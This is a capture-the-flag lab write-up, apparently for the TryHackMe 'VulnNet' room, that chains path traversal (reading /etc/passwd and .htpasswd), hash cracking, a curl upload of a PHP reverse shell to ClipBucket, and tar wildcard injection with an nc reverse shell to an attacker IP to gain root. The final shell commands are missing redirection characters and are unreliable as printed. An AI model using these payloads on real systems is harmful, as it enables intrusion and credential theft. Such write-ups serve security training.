# VulnNet ## Nmap ``` sudo nmap 10.10.14.164 -p- -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ### Web Server Investigating port 80, we are welcomed over to the Vulnnet Entertainment landing page. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FBmXkcrDjG9pqP1XLCjsW%2Fimage.png?alt=media\&token=ac7abf7e-dee4-4ea3-a5f0-606ffb461beb) ### Path Traversal Starting enumeration with ZAP's active scan feature, we detect a high alert for a path traversal vulnerability. ``` http://vulnnet.thm/index.php?referer=/etc/passwd ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNcjyx7U9CXYP72RxvY2g%2Fimage.png?alt=media\&token=8f505c4a-2ff8-4c6e-b5a8-fe2153f6e034) Whilst the path traversal works, the results are not visible unless looking at the source of the `/index.php` page. ``` view-source:https://vulnnet.thm/index.php?referer=%2Fetc%2Fpasswd ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F151DCTkJq3elozMm7UJJ%2Fimage.png?alt=media\&token=4cd62a74-f7cd-4e61-af6d-586423b1d35e) ### Enumeration From `/etc/passwd` we obtain the username server-management. For further information we use the path traversal vulnerability to acquire even further information about the `/index.php` page located in `/var/www/html/`. As per the image shown below, we can now see even further information and that the page is running ClipBucket version 4.0. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FsiPvZTEj16xRbhhcFqhb%2Fimage.png?alt=media\&token=6debf07d-1bfc-420d-8ec1-872a6bf213e3) A quick search with `searchsploit` reveals multiple vulnerabilities for version 4.0.0. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FSvjPRqmQSfSXLtu4p9Dv%2Fimage.png?alt=media\&token=bdab6331-06e2-404b-8236-509e6afb6cbc) **Exploit-db:** However, I was unable to successfully complete any of the suggested exploits due inaccessible and required directories. ### Sub Domain Enumeration Taking the enumeration further we start fuzzing for subdomains on . ``` wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://vulnnet.thm" -H "Host: FUZZ.vulnnet.thm" --hl 141 ``` Looking at the results below we get the response code 401 (Unauthorized) for the sub domain ; ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F113sYE0RenfwgmZOFlW5%2Fimage.png?alt=media\&token=928daae4-0adf-40d2-beae-0e4be9226daa) Appending the braodcast sub domain to our `/etc/hosts` file we then browse to the new domain and are prompted for credentials. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F3knpI9KwnZLkq8XOMi9y%2Fimage.png?alt=media\&token=126fe407-8ae1-481b-9f66-b90f73e8d282) Brute forcing the login page with the server-management user and Hydra provided unsuccessful. Likewise, admin and root did not work either. Back to enumeration... ### Further Enumeration Building on further from the LFI vulnerability discovered by ZAP earlier we start fuzzing for further files. We get a valid hit on `/etc/apache2`. ``` wfuzz -u "http://vulnnet.thm/index.php?referer=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hl 141 -R 2 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2ujQC5iXyq9UdVLL6zU0%2Fimage.png?alt=media\&token=ef63a2d3-07cb-4477-afa1-3f2162fb5765) Fuzzing for further files within the `/etc/apache2` directory we soon get a hit for .`htapasswd`. ``` wfuzz -u "http://vulnnet.thm/index.php?referer=/etc/apache2/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt --hl 141 -R 2 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FBPl8SyPQjqhOm9WumXYx%2Fimage.png?alt=media\&token=00b6243b-0a04-4843-9cb3-5992bfc9def7) Using `curl` we read the contents of `.htpasswd` and discover credentials within the file. ``` curl "http://vulnnet.thm/index.php?referer=/etc/apache2/.htpasswd" ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fc0Nk08qInemLvuAtntwE%2Fimage.png?alt=media\&token=9f59034f-d840-4bb2-8685-22363b3ca120) ### Hashcat Using hashcat against the rockyou.txt wordlist we are soon able to crack the Apache2 encrypted password. ``` hashcat -a 0 -m 1600 hash /usr/share/wordlists/rockyou.txt ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FKJnZuVKshD0Ehid7XBsb%2Fimage.png?alt=media\&token=05f8db49-78af-4663-8137-97c20c9242af) ### Accessing ClipBucket Using the newley discovered credentials for the user developers on the `http://boradcast.vulnnet.thm` web page we are able to proceed and are greeted with the index page for Clipbucket. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FPO0H3Ugh4aJpdjeE8QkU%2Fimage.png?alt=media\&token=2a87c908-a317-43f3-b8b3-4f2b8f7854fa) ### Arbitary File Upload / Shell Going back to Exploit-DB we can begin again, to look at the various vulnerabilities. In this instance I have chosen to proceed with the Unauthenticated Arbitary File Upload. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNfvuTX76VjoXKxTvBP7P%2Fimage.png?alt=media\&token=28b47357-cf2e-4413-bb3a-4faf7a2956bb) Using the PHP Monkey reverse shell generated from [RevShells](https://revshells.com/) I then used the command below to perform a file upload. ``` curl -F "file=@shell.php" -F "plupload=1" -F "name=anyname.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php" -u developers: ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F267vbYCuax621TT3ZwAr%2Fimage.png?alt=media\&token=c0682bcf-2157-49f7-8157-f36924f8d438) The response message includes the directory and name of the uploaded file. Using this information we start a netcat listener and browse to the uploaded reverse shell. ``` http://broadcast.vulnnet.thm/actions/CB_BEATS_UPLOAD_DIR/.php ``` Gaining access as *www-data*. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FcckObdP6IsIidpIZn7rQ%2Fimage.png?alt=media\&token=baf8fa2f-0ff7-4e80-995b-db8be3956466) From here we give ourselves a better shell experience. ``` /usr/bin/script -qc /bin/bash /dev/null ``` ### Crontab Performing basic enumeration steps on the target system we find the file `/var/opt/backupsrv.sh` is executed by **root** every two minutes. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2qQnirsMoIdJ6Cb9Z0OQ%2Fimage.png?alt=media\&token=1a661e6d-849e-47bd-87f8-648935575d28) Viewing the contents of the file we see that all files within `/home/server-management/Documents` are archived using `tar` everytime the scipt is run. ``` #!/bin/bash # Where to backup to. dest="/var/backups" # What to backup. cd /home/server-management/Documents backup_files="*" # Create archive filename. day=$(date +%A) hostname=$(hostname -s) archive_file="$hostname-$day.tgz" # Print start status message. echo "Backing up $backup_files to $dest/$archive_file" date echo # Backup the files using tar. tar czf $dest/$archive_file $backup_files # Print end status message. echo echo "Backup finished" date # Long listing of files in $dest to check file sizes. ls -lh $dest ``` Reading the script we see that `tar` is backing up files and ending the command in a wildcard. I have previously document performing privilege escalation in the TryHackMeRoom Marketplace using `tar` wildcard injection {% content-ref url="marketplace" %} [marketplace](https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/marketplace) {% endcontent-ref %} However, we have no permissions over the destination path of `/home/server-management/Documents`. ### Archive Exctration Looking at the files already backed up and archived to `/var/opt/backups` we notice two archived files of interest; Extract these to a writeable directory: ``` tar -xf ssh-backup.tar.gz -C /tmp/ tar -xf vulnnet-Monday.tgz -C /tmp/ ``` Viewing the `id_rsa` is of interest. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FtExoOjXFVECOCtoJh3aB%2Fimage.png?alt=media\&token=a04b6c6e-bfcd-42a7-bc25-5d812f1e4382) Transferring the `id_rsa` key over to my attacking system we are prompted for a password when trying to use it when connecting as the user *server-management*. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fo5pa9DEUqIOxOhquH0pa%2Fimage.png?alt=media\&token=3a0326b7-a910-4c8c-b024-088bb1f64471) ### Hashing and Cracking Using ssh2john we can hash the key file and then, perform password cracking to reveal the plain text password. ``` /usr/bin/ssh2john id_rsa >> hash_id ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fc9FNOl4qgyBSYpRw1Pbk%2Fimage.png?alt=media\&token=d52426fd-8120-4daf-bcdf-c08821c191dc) ### SSH as server-management With the now discovered credentials we are able to login over `SSH` with the user *server-management*. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fz7y72OQLevIs267hv1lE%2Fimage.png?alt=media\&token=b7e6eef7-4690-4752-b475-622ff87a12ef) ### Tar wildcard injection Revisiting the `/var/opt/backupsrv.sh` file we should now be able to perform privilege escalation as `/home/server-management/Documents` is within our home directory. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FxKjUpHhnwHCBa7gizg95%2Fimage.png?alt=media\&token=e019daee-a81c-460e-bdd8-a714c2aba1b7) Referring again to the steps I performed for the Marketplace room. Ensuring we are running from the Documents folder. ``` echo "mkfifo /tmp/ydzhkhh; nc 10.11.54.237 8000 0/tmp/ydzhkhh 2>&1; rm /tmp/ydzhkhh" echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > --checkpoint=1 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FFUQc2TtRUBbjJKcinIQw%2Fimage.png?alt=media\&token=879e9dfa-ad72-4df4-bd19-10b8071b1b25) ### Shell as root Start a netcat listener, wait a couple of minutes and obtain a **root** shell and then grab the root.txt flag. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FTARDYw625Vvi3u1OGcVc%2Fimage.png?alt=media\&token=ab268307-415c-4172-9d64-eedf1883979d)